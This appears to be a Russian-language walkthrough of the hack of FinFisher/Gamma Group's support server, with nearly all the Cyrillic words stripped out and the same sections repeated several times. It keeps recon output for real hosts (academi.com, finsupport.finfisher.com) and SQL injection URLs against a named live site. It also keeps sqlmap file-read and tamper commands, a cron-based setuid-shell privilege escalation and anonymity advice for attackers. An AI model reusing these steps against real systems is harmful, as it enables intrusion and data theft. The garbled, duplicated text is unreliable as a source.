, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell
chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/
http://overthewire.org/wargames/
http://www.hackthissite.org/
http://smashthestack.org/
http://www.win.tue.nl/~aeb/linux/hh/hh.html
http://www.phrack.com/
http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot
http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash
https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/
https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( )
https://www.corelan.be/ ( Exploit writing tutorial part 1)
http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/
http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook
Hacking: The Art of Exploitation
The Database Hacker's Handbook
The Art of Software Security Assessment
A Bug Hunter's Diary
Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier
TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
